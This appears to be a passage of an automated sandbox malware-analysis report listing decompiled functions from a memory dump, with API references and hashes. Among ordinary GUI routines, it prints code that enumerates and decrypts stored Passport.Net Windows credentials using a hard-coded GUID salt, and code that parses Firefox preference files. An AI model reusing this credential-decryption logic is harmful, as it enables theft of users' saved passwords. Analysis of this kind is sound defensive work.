							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405538(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E0040559F(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054C6(__ecx, __ecx);
						goto L7;
					}
				}
			}

0x00405715
0x0040571b
0x0040571f
0x00405725
0x00405727
0x0040585b
0x0040585e
0x00405867
0x00405869
0x0040586c
0x00405873
0x00405879
0x0040586c
0x0040587a
0x0040587e
0x00405850
0x00405850
0x00405850
0x00000000
0x00405880
0x00405880
0x00405883
0x00000000
0x00000000
0x00405885
0x00405888
0x0040588f
0x00405897
0x0040589a
0x0040589c
0x0040589e
0x004058ed
0x004058ed
0x004058f1
0x00000000
0x00000000
0x004058f7
0x004058fb
0x00000000
0x00000000
0x00405905
0x00405913
0x00405921
0x0040592f
0x0040594d
0x00405950
0x00405956
0x00405959
0x00405852
0x00405858
0x00405858
0x004058a0
0x004058aa
0x004058b2
0x004058b4
0x004058b6
0x004058ba
0x004058c2
0x004058ce
0x004058dd
0x004058e8
0x004058e8
0x00000000
0x004058b4
0x00405891
0x00405895
0x00000000
0x00000000
0x00000000
0x00405895
0x0040587e
0x0040572d
0x00405732
0x00405844
0x0040584b
0x00000000
0x0040584b
0x00405738
0x00405739
0x00000000
0x00000000
0x00405742
0x00405748
0x00405762
0x00405765
0x00000000
0x00000000
0x00405771
0x004057a6
0x004057b7
0x004057bf
0x004057bf
0x004057ca
0x004057d2
0x004057d2
0x004057dd
0x004057e8
0x004057ee
0x004057f5
0x00405800
0x00405806
0x00405812
0x00405819
0x00405819
0x00405820
0x00405822
0x0040582c
0x0040582c
0x00405830
0x00000000
0x00405830
0x00405776
0x00405779
0x0040577d
0x004057a0
0x004057a1
0x00000000
0x004057a1
0x0040577f
0x00405781
0x00405786
0x00405789
0x00405790
0x00405795
0x00405796
0x0040579b
0x0040579b
0x00000000
0x00405751
0x00405757
0x00000000
0x0040575d
0x0040575d
0x00000000
0x0040575d
0x00405757

APIs

GetDlgItem.USER32 ref: 004057BD
GetDlgItem.USER32 ref: 004057D0
GetDlgItem.USER32 ref: 004057E5
GetDlgItem.USER32 ref: 004057FD
EndDialog.USER32(?,00000002), ref: 00405819
EndDialog.USER32(?,00000001), ref: 0040582C

Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
Part of subcall function 004054C6: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405505

SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Item$DialogMessageSend
String ID:
API String ID: 2485852401-0
Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}

0x00405960
0x00405964
0x00405969
0x0040596b
0x0040596e
0x00405971
0x00405979
0x00405981
0x0040597b
0x0040597b
0x0040597d
0x0040597d
0x00405983
0x00405986
0x00405988
0x0040598a
0x0040598c
0x0040598d
0x00405993
0x00405993
0x00405999
0x0040599c
0x004059a6
0x004059a7
0x004059aa
0x004059b3
0x004059b4
0x004059c3
0x004059c5
0x004059d3
0x004059d8
0x004059db
0x004059e0
0x004059e7
0x004059ea
0x004059f3
0x004059f4
0x004059fc
0x004059ff
0x00405a01
0x00405a03
0x00405a06
0x00405a0e
0x00405a11
0x00405a11
0x00405a03
0x00405a14
0x00405a14
0x00405a2c
0x00405a34
0x00405a41
0x00405a41
0x00405a4a
0x00405a53
0x00405a55
0x00405a58
0x00405a5d
0x00405a61

APIs

??2@YAPAXI@Z.MSVCRT ref: 00405971
??3@YAXPAX@Z.MSVCRT ref: 0040598D
??2@YAPAXI@Z.MSVCRT ref: 004059B4
memset.MSVCRT ref: 004059C5
??2@YAPAXI@Z.MSVCRT ref: 004059F4
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405A41
SetFocus.USER32(?,?,?,?), ref: 00405A4A
??3@YAXPAX@Z.MSVCRT ref: 00405A58

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}

0x0040a6a5
0x0040a6b7
0x0040a6cd
0x0040a6df
0x0040a6e0
0x0040a6ee
0x0040a6f9
0x0040a6fa
0x0040a709
0x0040a71a
0x0040a73a
0x0040a761
0x00000000
0x0040a771
0x0040a773

APIs

GetClientRect.USER32 ref: 0040A6B7
GetWindowRect.USER32 ref: 0040A6CD
GetWindowRect.USER32 ref: 0040A6E0
BeginDeferWindowPos.USER32 ref: 0040A6FD
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
EndDeferWindowPos.USER32(?), ref: 0040A76A

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$Defer$Rect$BeginClient
String ID:
API String ID: 2126104762-0
Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24

Uniqueness

Uniqueness Score: -1.00%

Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}

0x0040606a
0x0040606f
0x00406071
0x00406079
0x00406084
0x00406084
0x00406093
0x00406097
0x004060a3
0x004060ac
0x004060b5
0x004060bf
0x004060c1
0x004060c1
0x004060c4
0x004060c5
0x004060cf

APIs

EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
strlen.MSVCRT ref: 0040607E
GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
GlobalLock.KERNEL32 ref: 0040609A
memcpy.MSVCRT ref: 004060A3
GlobalUnlock.KERNEL32(00000000), ref: 004060AC
SetClipboardData.USER32 ref: 004060B5
CloseClipboard.USER32 ref: 004060C5

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
String ID:
API String ID: 3116012682-0
Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}

0x0040c54b
0x0040c551
0x0040c55f
0x0040c565
0x0040c573
0x0040c579
0x0040c581
0x0040c587
0x0040c596
0x0040c59c
0x0040c59f
0x0040c5a8
0x0040c5af
0x0040c5bc
0x0040c5c3
0x0040c5c4
0x00000000
0x00000000
0x0040c5cf
0x0040c5d2
0x0040c5df
0x0040c5df
0x0040c5e4
0x0040c5e7
0x00000000
0x00000000
0x0040c5fe
0x0040c600
0x0040c610
0x0040c61b
0x0040c661
0x0040c664
0x0040c669
0x0040c66e
0x0040c671
0x0040c675
0x00000000
0x00000000
0x0040c677
0x0040c689
0x0040c68e
0x0040c696
0x0040c69d
0x0040c6a6
0x0040c6ab
0x0040c6b0
0x0040c6c1
0x0040c6c9
0x0040c6cd
0x00000000
0x00000000
0x00000000
0x0040c6cd
0x0040c61d
0x0040c62a
0x0040c62d
0x0040c62e
0x00000000
0x00000000
0x0040c634
0x0040c646
0x0040c64b
0x0040c653
0x00000000
0x0040c6cf
0x0040c6dd
0x0040c6e5
0x00000000
0x0040c6ec
0x0040c6f0

APIs

memset.MSVCRT ref: 0040C551
memset.MSVCRT ref: 0040C565
memset.MSVCRT ref: 0040C579

Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A

memcpy.MSVCRT ref: 0040C646
memcpy.MSVCRT ref: 0040C689
memcpy.MSVCRT ref: 0040C6A6

Strings

user_pref(", xrefs: 0040C5AF

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpymemset$strlen$_memicmp
String ID: user_pref("
API String ID: 765841271-2487180061
Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}

0x004055ab
0x004055b6
0x004055cc
0x004055cf
0x004055dc
0x004055de
0x004055ea
0x004055ee
0x004055f3
0x004055f4
0x004055f5
0x004055ff
0x00405600
0x00405605
0x00405608
0x0040560d
0x00405612
0x00405615
0x00405618
0x0040561b
0x004056f5
0x004056f7
0x004056fd
0x00405712
0x00000000
0x00000000
0x00000000
0x00405621
0x00405621
0x00405621
0x00405624
0x00405627
0x0040562d
0x00405638
0x0040564c
0x00405652
0x00405660
0x00405669
0x00405673
0x00405680
0x0040568b
0x0040568d
0x00405696
0x00405697
0x0040569c
0x0040569d
0x004056a5
0x004056a7
0x004056b9
0x004056be
0x004056c3
0x004056d3
0x004056d3
0x004056c3
0x0040568b
0x004056d6
0x004056d9
0x004056dc
0x004056e0
0x004056e9
0x004056ec
0x00000000

APIs

GetDlgItem.USER32 ref: 004055B6
SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
memset.MSVCRT ref: 00405652
SendMessageA.USER32(?,00001019,?,?), ref: 00405683
SetFocus.USER32(?), ref: 00405708

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}

0x0040d5db
0x0040d5ec
0x0040d5ee
0x0040d5f6
0x0040d5f9
0x0040d5fc
0x0040d601
0x0040d603
0x0040d619
0x0040d61a
0x0040d61b
0x0040d61d
0x0040d627
0x0040d62d
0x0040d633
0x0040d645
0x0040d64d
0x0040d650
0x0040d652
0x0040d653
0x0040d653
0x0040d65e
0x0040d666
0x0040d667
0x0040d67d
0x0040d680
0x0040d68e
0x0040d6af
0x0040d6c8
0x0040d6d1
0x0040d6d1
0x0040d6d5
0x0040d6d5
0x0040d6db
0x0040d6db
0x0040d6df
0x0040d6df
0x0040d627
0x0040d6e5
0x0040d6f0
0x0040d6fa

APIs

Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726

Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,74B5F420), ref: 00404654
Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D

Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,74B5F420), ref: 004047A8
Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
strlen.MSVCRT ref: 0040D6B7
strcpy.MSVCRT(?,?), ref: 0040D6C8
LocalFree.KERNEL32(?), ref: 0040D6D5

Strings

hwA, xrefs: 0040D680
Passport.Net\*, xrefs: 0040D61D

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
String ID: Passport.Net\*$hwA
API String ID: 3335197805-2625321100
Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}

0x00407efb
0x00407efe
0x00407f06
0x00407f10
0x00407f18
0x00407f1c
0x00407f20
